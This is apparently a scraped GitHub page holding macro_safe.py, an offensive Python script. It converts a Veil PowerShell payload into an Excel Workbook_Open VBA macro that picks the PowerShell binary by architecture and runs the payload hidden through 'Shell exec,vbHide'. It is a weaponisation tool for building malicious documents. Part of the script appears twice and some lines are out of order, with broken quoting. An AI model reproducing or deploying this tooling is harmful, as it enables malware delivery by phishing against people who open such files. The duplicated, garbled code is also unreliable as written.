You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
f = open(fname)
lines = f.readlines()
f.close()
cut = []
for line in lines:
if "@echo off" not in line:
first = line.split('else')
#split on else to truncate the back half
# split on \"
cut = first[0].split('\\"', 4)
#get rid of everything before powershell
cut[0] = cut[0].split('%==x86')[1]
cut[0] = cut[0][2:]
#get rid of trailing parenthesis
cut[2] = cut[2].strip(" ")
cut[2] = cut[2][:-1]
#for i in range(0,3):
#print str(i) + " " +cut[i]
top = "Sub Workbook_Open()\r\n"
top = top + "'VBA arch detect suggested by "T"\r\n"
top = top + "Dim Command As String\r\n"
top = top + "Dim str As String\r\n"
top = top + "Dim exec As String\r\n"
top = top + "\r\n"
top = top + "Arch = Environ("PROCESSOR_ARCHITECTURE")\r\n"
top = top + "windir = Environ("windir")"
top = top + "\r\n"
top = top + "If Arch = "AMD64" Then\r\n"
top = top + "\tCommand = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"\r\n"
top = top + "Else\r\n"
top = top + "\tCommand = "powershell.exe"\r\n"
top = top + "End If\r\n"
#insert '\r\n' and 'str = str +' every 48 chars after the first 54.
payL = formStr("str", str(cut[1]))
#double up double quotes, add the rest of the exec string
idx = cut[0].index('"') #tells us where IEX is. Now we also have to subtract 10 to remove -Command
#!/usr/bin/python
macro_safe.py
Takes Veil powershell batch file and outputs into a text document
macro safe text for straight copy/paste.
import os, sys
import re
def formStr(varstr, instr):
holder = []
str1 = ''
str2 = ''
str1 = varstr + ' = "' + instr[:54] + '"'
for i in range(54, len(instr), 48):
holder.append(varstr + ' = '+ varstr +' + "'+instr[i:i+48])
str2 = '"\r\n'.join(holder)
str2 = str2 + """
str1 = str1 + "\r\n"+str2
return str1
if len(sys.argv) < 2:
print ("----------------------\n")
print (" Macro Safe\n")
print ("----------------------\n")
print ("\n")
print ("Takes Veil batch output and turns into macro safe text\n")
print ("\n")
print ("USAGE: " + sys.argv[0] + " \n")
print ("\n")
else:
fname = sys.argv[1]
f = open(fname)
lines = f.readlines()
f.close()
cut = []
for line in lines:
if "@echo off" not in line:
first = line.split('else')
#split on else to truncate the back half
#for i in range(0,3):
#print str(i) + " " +cut[i]
top = "Sub Workbook_Open()\r\n"
top = top + "'VBA arch detect suggested by "T"\r\n"
top = top + "Dim Command As String\r\n"
top = top + "Dim str As String\r\n"
top = top + "Dim exec As String\r\n"
top = top + "\r\n"
top = top + "Arch = Environ("PROCESSOR_ARCHITECTURE")\r\n"
top = top + "windir = Environ("windir")"
top = top + "\r\n"
top = top + "If Arch = "AMD64" Then\r\n"
top = top + "\tCommand = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"\r\n"
top = top + "Else\r\n"
top = top + "\tCommand = "powershell.exe"\r\n"
top = top + "End If\r\n"
#insert '\r\n' and 'str = str +' every 48 chars after the first 54.
payL = formStr("str", str(cut[1]))
#double up double quotes, add the rest of the exec string
idx = cut[0].index('"') #tells us where IEX is. Now we also have to subtract 10 to remove -Command
#next our stub for the payload
cut[0] = cut[0] + "\"" " & str & " \"" " + cut[2] +""" #deprecated
#insert 'exec = exec +' and '\r\n' every 48 after the first 54.
execStr = formStr("exec", str(cut[0]))
execStr = execStr.replace(""powershell.exe", "Command + "")
execStr = execStr.replace(""Invoke","""Invoke")
shell = "Shell exec,vbHide"
bottom = "End Sub\r\n\r\n'---Generated by macro_safe.py by khr0x40sh---\r\n\r\n'---VBA arch detection by "T"---"
final = ''
final = top + "\r\n" + payL + "\r\n\r\n" + execStr + "\r\n\r\n" + shell + "\r\n\r\n" + bottom + "\r\n"
print ( final )
try:
f = open(sys.argv[2],'w')
f.write(final) # python will convert \n to os.linesep
f.close()
except:
print ("Error writing file.\n Please check permissions and try again.\nExiting...")
sys.exit(1)
print ("File written to " + sys.argv[2] + " !")
The text was updated successfully, but these errors were encountered: